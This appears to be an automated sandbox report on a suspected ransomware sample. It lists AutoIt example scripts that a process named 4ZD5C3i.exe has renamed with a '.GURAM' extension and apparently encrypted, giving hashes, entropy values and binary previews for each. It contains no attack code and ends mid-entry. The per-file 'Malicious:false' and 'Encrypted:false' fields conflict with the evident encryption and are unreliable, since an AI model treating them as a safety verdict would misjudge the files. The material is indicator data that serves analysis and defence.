                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:Amgf6zG2G113Rnhherf5hAqMixjmJrc0YXUZtwsTc:Zk1F5Xerf5hEiB4o0jZtwX
                                                                                                                                                                                                                                                MD5:B324FFC54614F2E8DE8AE71E2432C502
                                                                                                                                                                                                                                                SHA1:D1A000BD117B95B09B7024CC0AE165FF23FCFF9A
                                                                                                                                                                                                                                                SHA-256:73FCFD4AE5FF72B2AA4C9A8278067BE55EA243C0C5A294CDEB2A44447430968F
                                                                                                                                                                                                                                                SHA-512:E9CBC883E64F8C5BAD72AC2E1A89F6C77BAF4F006AEFDFB3C847123ADFBA303D799EE58E28A4B48CE3FC5235EF20213F101B14FD7B9EA17D7EEB9E30171A0589
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...DU..........'....NVH..N..K.>.........).c9*\....RD.)#......i..H.... l..r.4.....Do...X~.P..DN?T.M^P.....Xw.....!...f|.c].f6_hr....uO9A...(.@.._Xz.j..ZV........le.<...c*I.7I....s...<w.qW{'.oP.8.z..=Z........|/.jw.t..K.u-..!....XET.$..>hU4y.P......R..j.?..f...f...M...!N}$.....Y../.7...A.....0v.Cb......Nv...k.o.r.D...%.b..b...DZ.e5.z.c8&.K.D.J..a.....fNp.....9..LY.QHh#.[5v...|k.<.c.9.n.......7..r.q.u!...s.....&....'.`..'.....].UxU...e.L...b.g*7.)..}'b...f....P....F.4...CQFZ4..!.)X..T.......E:-2..r.,...NJ.X....R4..p..p..F?..G.0..2.}..D..w.....|..*w..$.F..3..8.Zoj.39.(%)m^W.Z...7...M..;_.Z.\.".c..l*(;..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F...

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayColDelete.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:DOS executable (COM)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1133
                                                                                                                                                                                                                                                Entropy (8bit):7.810388439021658
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:6lgyUuDAdvQ0f9dX+ffyh/1E2jmJrc0YXUZtwsTk:6lowAdPFdyKN4o0jZtw3
                                                                                                                                                                                                                                                MD5:AD043EDF1874EFA3060BE6495ECBB7FD
                                                                                                                                                                                                                                                SHA1:F5E575E7E9EE1AC61950E59633F2463EEFB627A6
                                                                                                                                                                                                                                                SHA-256:917C6906962EB5EEA38516AA1F3FE089BA8CE7C637045DD4588AFAAC600CDF42
                                                                                                                                                                                                                                                SHA-512:4CE2B1281BDFCF1CF3F4075903CC4FAECF6CC9CD3E8EC8414771C611DF2A3F619AC56503C814E831B153C82DDDA1BD3A4AA89FF5D59B740E21AB10B206DACD86
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.$..".g....A.........\.q^..T..[X0._...nG".a...@V.i.T.n.r,.XKi....q...'n.u..g7.F.T..!.*MoB.D.vyJya..X[4d........".N.K.....1r_.% o..[U..$.<.....$H..?`....;9...#,.........)....z.gNN.j.....|..Y!..A.&^N.....V....-U.d.Xp...1..\f...M....Y.8.f..F,#8/.8.......t'_.h.Vn?..../(9..Pqk6.....M ..y.N..^.-GH...5.i&j.<..Y-'.e0OT.].X..38...ua.X/....m.......-....u..F...C X.|O.'..l....aU.._..................CvT...<...._A.M.DM>..|.......:.V.../.a.N)..3@...S<.....R.=+.GO.$.G.w<.........m......s.'...*_....t@.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayColInsert.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):938
                                                                                                                                                                                                                                                Entropy (8bit):7.742590329492485
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:CA398s5IZGUOYIWLNCJs0gYjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsw:Cy9BeIWLQJ1jmJrc0YXUZtwsTIQIy
                                                                                                                                                                                                                                                MD5:EFA1F64DA28F9379554F76AB27D754AC
                                                                                                                                                                                                                                                SHA1:D02EB6AE06079999369279095FBF583233CDA72D
                                                                                                                                                                                                                                                SHA-256:AFCDE4D973E314213A820779C395265676959F0BF29867719401660E2C85699E
                                                                                                                                                                                                                                                SHA-512:086D4E1428190D1D76C3CCE8628E749A504B8EB4149ABCFF365EFD740BBB09100BB74F5040524AD044C03BB2FC213226861092C159EA0757131D1BD890BF2574
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:<.g. e...PhR.d.....g."[...?..*..(...G.dD]......k.)-c.....F$.\.D..E....4..{.)..2A(..k.V.K..;@c.h..i..".m.g.J....}...?cf%.-4./......M..[.},,.......iIW...5.....J5...#v.dc..O..{.5.8..u.Cj..r.O.[.k..(q..CG7`DO......U.U?.!...<.iD..A.../*k...(..(].e..F.#.R.<ZEL...L..Z..[.D..!x.i..%......!.....k...W)....q......G,:.h.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$...i.S4.{;.B.....*W4* ....p.zJ......hJ...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayCombinations.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):903
                                                                                                                                                                                                                                                Entropy (8bit):7.749554775563219
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1j4PvLb/7wUVnToM6mA8LjmJrc0YXUZtwsTr:1jcLb/7htZ6mA8P4o0jZtwk
                                                                                                                                                                                                                                                MD5:339567A40955949F537B210AEA163C22
                                                                                                                                                                                                                                                SHA1:C702F7BB1CB8B25767970B2808C53CCAA613A336
                                                                                                                                                                                                                                                SHA-256:E0839779636855C1C9F744315A345602D4C417B62F510129755FC8285A65AC5D
                                                                                                                                                                                                                                                SHA-512:30D42B8991C9C554CC99D1B14B7D86E8DC2565068970E86C127D452E3A23E78C86A4D70F42B78ABBE3ED8AB1FC889953504F4DDC1A412504CF59B2338CC3686F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.nh.q...T.:.......Q..v......Yq..b..eY.......e.....H..J&Q:........8.l.S..P.P.]..O.b.J.te1. .;/.....(.I_.|jU.q..".z....R..?.Ca.Y$....y.C...t.....)u.A..z.7p.+r..lj...."D.7/.JZQ..sB.y'......V.....U..A..Ba..q.i.y..1.`^p7....4......C..YI-.c....$....uQ...R..Fa...9u...1.sz.y.\...;...R2^l..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.Y.Y..z.......D.9...Mc..w.S..o=].4.'...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayConcatenate.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1374
                                                                                                                                                                                                                                                Entropy (8bit):7.860009177497254
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:UwtqxKkrB82Q2t5YlICYdHD7pTHDK/jmJrc0YXUZtwsTph:7bMq2tKJejl3Kb4o0jZtwQ
                                                                                                                                                                                                                                                MD5:1C54E2E03DC9F8ED2573F0ECEDD3F089
                                                                                                                                                                                                                                                SHA1:18581905588FFAD127B1D4CE8C5E2EA8E3CF8DDF
                                                                                                                                                                                                                                                SHA-256:31E58F40C3E9CDBCC9051B04EC254C1940329F9BD7CFA45540CF7E14C9CD97AD
                                                                                                                                                                                                                                                SHA-512:0566D215DD488846A370AE4C9E59E04E59BBA7DD7125C548D79152DE2846F91D9AC425F11CFC37D076936778113CC93739655CEA7FC8BA77E67BFA516B10E6A7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.&!..xi....P..I..$.....D9N.F...}fM..[.....~..........._8..?Bx..=:.+.hi.\i.G..O..+b..*..;:f[..^8......Sg..cXO.yE....o....X:Niz.3..x....L..A..$..0..).....6..D..Q.&..m\..3....WIW".F...k!Z.?. h(_l....Gx..c.c>...c...jy.Uc4.Z..z.P..0o.......q......pB.A.4.T..l|....{.!.i$.x..}...B..jJ......a..-J.....;..=....tK...bI.....^.3........]......J|....O....2.A.&.sc.R4T.9%...6.<E....`!4.0.77.Rj...Ku.F.......~.iM....h..p.~.....s..+J.@B..?..x......T.w7<'..$.1.`..)....c.(Q........q...-.T...x..n...V.V...v.~....{+...0.'....6.w....o....M._..+.y....i..h...A....W.DZ...M.0.t...7.@.}.p.U..I.*...{.~.o.BF.fv....>W......>..T7..R.f..8.M.S.xF.<E..W,...t...&.#..*\..U.P..?.wF..A.<w...T..a.u.f.Ia......{.3?A.i@..i<.....iY7kn.Q..:g..e.,...<.S09C^w8v.N.RU=9Yw/<e.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N....

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayDelete.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1472
                                                                                                                                                                                                                                                Entropy (8bit):7.884945481536755
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:02xed/kopQWc1dmkGnM8IYYy8pLldwVa+bmFNWtfKjmJrc0YXUZtwsTAL:0VdRpQW2GMJjpxdwk2mFsfU4o0jZtwpL
                                                                                                                                                                                                                                                MD5:922443342680838E061C42CBE447A056
                                                                                                                                                                                                                                                SHA1:53EB56921E01DFE13C908620209ADF8268D1BCE7
                                                                                                                                                                                                                                                SHA-256:0700584021274C3E0F2D427C5E0FE71BC275815B98B67C0CB80BAF9FF537E2AD
                                                                                                                                                                                                                                                SHA-512:DF52EB0F841C3185D6DC675B988EAC4BBEEBDD1B27328CE71426B36E4074F365654FA2405F98B65BF17B9BFCA7F3D795D698CD753A7AF6E1002DC0212E866CD7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:C.<..(....."O..h.f9.@.f0.!R..$K.d.....[.^...!...T.....57../k.^..l.MT.(..b7v...<..-2:~...gN!+FP.Y.......bo..C......a.h....+IL>.<;.*.%.G.......*1.lv..eQRFp...XO./.W.K/.*5...@...y.#.((\.../.g...ngu.&!.../*.@..d.._..?.....S4..1s.....B.D !.....#..p.tL~9"2...m. L...X.1.3.9.....x...5.>OX.6#.?,S..... ......+z.+...4...>.~v>...i......l....u..QYd...j.[..A}.EOH....Ii.*.H.}.....J..2.').h.......y?'..h..@I.."..B.X...R`.....R2]..\.|.j.........0i.]....G.a.14..>r..5..v&8(u>.X.rK`.EJ1.......7$qY.v....Y...]..V......H0@'2.h..0x.G4eB"..{.&.h...m...cfC...PE_..2^]..g.F...M.0.....]..... GL.".....9h.N....2........y]/....4,..*.J. ....s..M8..P(S.k.jH........@........%..j3..d%..1.8P..r.....=F...e..........t...K...h.dI..-..=...<m....J.....S.ILk%.2..{.U.qBr.h&.T.:.8d&.2.6.@...._... ..2..w...n{....g?.h..v5".v.r.f.4...5}....7.....C...Z....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayDisplay.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2327
                                                                                                                                                                                                                                                Entropy (8bit):7.915400737640085
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:J3ySuvdOlorYTnKxnj294EGEnkR+2jdyc9tP6kSu4o0jZtwP:lySuTEnI2JGsk824c/NSDleP
                                                                                                                                                                                                                                                MD5:28D6BFF0A5940EDE58076D555AECFE12
                                                                                                                                                                                                                                                SHA1:66BB5C2AFE5A85F57EE1C2DEF21BD16D72CCA115
                                                                                                                                                                                                                                                SHA-256:B71980322C785FA642F1519A13FD90C8D7817116C59688A8B69925F31C34E52D
                                                                                                                                                                                                                                                SHA-512:2B6F849ACEA2BBE8D9F2881FC0AAB6A486D0ADF3275B78C68289DD95C6E959F940D6CBC9AF05A1F0FBCC9DA0F94CFA82F7114EECB162D2EC04ED246D2BEA9FF0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:~...#.bf......bR...a9.@1.?3.a....e.ht....A.y3.#.X$)O.6.k.r..G...?..0GS...3....fs`.....(.L*.0Qo;$.i...b.m..@.i..X.3...........s.>.p.$..3..-c/Q.".J./{?..k.-.*LY...h...;9>".y.nC..hl.t2.].<.Bcj.#.1.........}..O..Y...F.v.|v..q. E*I.cR..5..T.X...h.....m3.{..3.....83...G......D.N..Ir..:Q.........k..;....3...}3.6.^..g....R,...+.wC..u.....Vkd....J..t."..k..q.IG.......D.AjS.i#.aTJ1.D.-.c:.c...1{v..Wt.y....ZMW8..j...-m....+.....om.}3....AiP...cmM...L...........?.t6.Y=..^fF.......2......?.>k....V.N........'D).......;p....9&..'.......?.7DhLu.I..KjK..|yn.l.....g..~.].Xt9c....?...!......w../U.....v...G.>}j/....1..Zy$Q..N)....f.'Sq.f.P.g....Y.....3.HF:v|..I.7i...:.j-....}.W..}n.d.W.H..giQ.....a-.....Q.1T.."A....A.....6.@$y.`.'^v.*AU.W.p....#..../.2..X...8 ..z..&.).V...Q..............?...&2cU....n.rxc.....a.*.2.2.5..9........9.AV.&..g".G....B..s..G]....A..|"<..[...4.%Z.A....f8.[z/..F.1......9......Bf8..\.G3_..H:.....[>.......A.q..0.r.K...M,.....J

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayExtract.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):866
                                                                                                                                                                                                                                                Entropy (8bit):7.75008154434933
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:X5vtdHQeJRoT9afwlY0HKjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1d:JjQekT9afyYuKjmJrc0YXUZtwsTmy
                                                                                                                                                                                                                                                MD5:DED02001F9E33B8DC6C81F22E09DC0C4
                                                                                                                                                                                                                                                SHA1:82F878A9DAF58C105AFC665F3F55AA0A6B4258DC
                                                                                                                                                                                                                                                SHA-256:13C1DFA78C65147E901172477034763234A2CA111B23BF88F3F367EC7BAC220D
                                                                                                                                                                                                                                                SHA-512:1F3D3F4C0DC6EF622D4B1DD96F3DE736E7B9A7A872CB79E21011D7447D983F37CE55EEACB27BBB67864D9F3ECA450468856355931C5F2BA4EEADF65759DCD655
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.17r.K.s+.>../..u..\4.....(........g*.w*%?8e..B....Dx.2.z....X.>H..G..#....B^..e..?.....)...w.zp ..ud...W.;.....67.d....$.u/..E9QY..6'Ks@.O.H..o...3.w....s..`/.>.(Pm....'U..#6.#..e...r.......v........G^....+.m.o C,P...cNm.AO..#z..&.".G.B._-...N.T!.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..6.L`..l.E._j..kwn..4?"h]Tls8Ll..b....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayFindAll.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1210
                                                                                                                                                                                                                                                Entropy (8bit):7.799427418360245
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:XUb1OeKCBh7FDDjoPaVV7NV0pjmJrc0YXUZtwsTn:XWuChE6054o0jZtws
                                                                                                                                                                                                                                                MD5:06BFFBD76FE3B5060C51BB4841F618A4
                                                                                                                                                                                                                                                SHA1:43AB88CEF91B45998B56A9B1D1E086E43DD2AFC5
                                                                                                                                                                                                                                                SHA-256:ED168BDD59C87DA63AAF1FCFB63C3E99C83CE47FE9E9C43086502ACAC77389FA
                                                                                                                                                                                                                                                SHA-512:0951BB35F712D61EDBBD08563D4D2B37287B1B906A16CA6B44F6EAE992832406EBE36339EA9F293A7ED03359A0CCE2B5158A559FDAFF2AD0E9414A25B3668D92
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..s0.;./p....BM..F.z..~.Tu..4.,0o...\4;q[...o...7..O.u.L.....L.p.$@U.`../>......vK..Pju.]..T..=.Ux'~.N..o.W.U.Y..]............H.]...Z.#\13#j.@...U.H?6...8.yf.e.....Z..).l?F....)...t.8D.e-&....}..A...L.Y.....0.d>-.... 4TN.~:3..}E.cn.D.j..6..k.H..~Gp*..O:......)}..P....w..9.1i.../........;.v.3..Z.%......4:iJ.Bq...<.1v...[.w=t.q.....c.F..^.b..#..=......l.......".N..9K.S.>...Q..[.E..0G..H.Oi.VOHvF...rw?.f...T....S......5..\.Y...2..........C.s.NV..V)Q...)......E5P...Jc.0UP.8..Am.J..)....l/........(.I..?@...j%.X.Tp%....*#..1.8~<.....I....&.f..S/.z....X.Dv.O.[K.h".&..{.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|....

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayFromString.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1281
                                                                                                                                                                                                                                                Entropy (8bit):7.835550332983771
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:J+3K91fii4p1nirtTn2BiuMUqO8KkRBjmJrc0YXUZtwsT1s:J+CEPpeNuMUqOUX4o0jZtwB
                                                                                                                                                                                                                                                MD5:F34F44488494502ED67C32CB839CA0FC
                                                                                                                                                                                                                                                SHA1:EFF59269675C181FF88C61D23030DE3F1E055764
                                                                                                                                                                                                                                                SHA-256:6296960AF77F131A27E1A6988C66BFAAAD54105B0566AAC764D38CC258B28609
                                                                                                                                                                                                                                                SHA-512:540C146D9E70DD35676D531F5A9FA536D956BE7504BBDD40956FD062FDD3EC4D0C63CE0E97F023DAD603E6360D0C9FC87DCA1E356198356D1E885170A2C84D31
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.t..Dlf.....Zu7p9.^X..?jQ..R..=..#...g..."..O3..5H7t..MFj..e4J. .....H0T.&...c..}.@.&$9.[Y..E#0.h8.D.....B.....A;..qF.<.W.Z.KQ`=y# J<..F..>....hl2...X. ...K..s.}...?.+a... "&3.....*.@.w.....Z...8.)..0....#.......B.....w..[.F1,.p..^......zh......C....5..=..b!K....".].. .S.w;..:.+........i,.`.\.....e.......z kLM...+q.Rp.....J.........g(..)..P[Z..z......>u...q.....(K.a....NI...`j....*z5K...u...kS...F.c.p.......?...]..WZH.3...F.K.2....GH..`u.H.../.....kru...p..+.~6..A..9...!...L.%..){:.V....)}Nw.#.&r4..7..9$^...J..2..&jn..;o.#..3`...h.>........4....+V.....G..c.+..+.....'...Y....<..-.t5.{.{.f....J2m.......................0-..@3.=..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.})

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayFromString[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2673
                                                                                                                                                                                                                                                Entropy (8bit):7.92661175954283
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:gsS5J8+guqXEUvQq9M1+iSWmh0F1w4vtL7SKuGF9q4o0jZtwhdu:gsSX8+PiEUvFrXH4vFCqllehc
                                                                                                                                                                                                                                                MD5:7756CE18C3D08C68FEDDE19A251EC85B
                                                                                                                                                                                                                                                SHA1:27F34DD6549B9A6A0467C63A496B7FF20B34D8BE
                                                                                                                                                                                                                                                SHA-256:FF082DD920DFC5822ACB12C94632CCE3843F22F9A905736577531C8AB914FAAD
                                                                                                                                                                                                                                                SHA-512:2AEB7D4F5343F6A7403B75656D56DEB79761DD2B77C285EEDD4F162418A21DEA9759B2826490C480D20EFBBCCE51649338232D88CBB25369D721FBBBF5F3DD04
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:I......}?......|.....d..._...T..R.!-.k ].j..f.K.D.[...U@..k...T..&ht.."...U....;b.e..@iK.R..c>gD..EI.y...u.g..f.L....h.....@....#.6..g...-.5I.t.AM..J.Hi.......c...4.U^.C.Oql....v,..5..f................".s%.R....iK.eOIF.G.....-.M..I9..=.o.L.l.>.. .}.....R...*z.D....../.............;S..(+.?<.'..7Y...V........N.*.{7l.....@.ZF...;..5.......U3.m/..WU.HTbU.E]..6m.Fe.XOx....Z..1.OKe/..".n.4.9X.u..h..X.I.em....:..u..;7f.._YO...d..i..'?2.....XEy.Wx.......s.O..zQ.`.\.@..|(*....V.'y.]...2...1....).@...t. i.-D.%..Xj....OY...4..l....N:..Qk.(..Z...\..j.zB@.....kf..w.E../.u8.mf..j'.$...y..9.S..m0A....ed.U..w.D.)!4_7=.{.6.'..\=.2w....].......S.5.....E.w.F..c$...=.dz9..SP....d.......F..Bf.9..9......n.g.P.~..D..m>....(.....h.^..<...sC.[|'...+.{.S.+..Z7..."..R.CbKR..P.d..E).B.9.3......5`.\.f.[....K..$].W`?4.ka,.&..v...l.x..4IJO.f.+.x*L...}b..[.gZ@.)H.X8^.wM...[d.cK.F...J.q.uG....wo.(.....J....^&.......c..!.%8..DE....._..|.~...e. H..........UZ>.Oq..z.....

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayInsert.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1683
                                                                                                                                                                                                                                                Entropy (8bit):7.8809619325688836
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:4GXB2lBjBwU859XEos6N9/XWyTn7fPlN/PYwxu6D+Vaqbk/tjmJrc0YXUZtwsTpQ:pXkTjW/TsVyTLb/PYwnDVt4o0jZtwJ
                                                                                                                                                                                                                                                MD5:3B2761A50CC3E1406AAB046B558ECC50
                                                                                                                                                                                                                                                SHA1:6BDAB87F9D98925D7142C893F9E14D6BF76B5127
                                                                                                                                                                                                                                                SHA-256:95DEF581ACB392E996DB6BE060F1DE896FCC4E95F9F374EF6D28CD72059A72C6
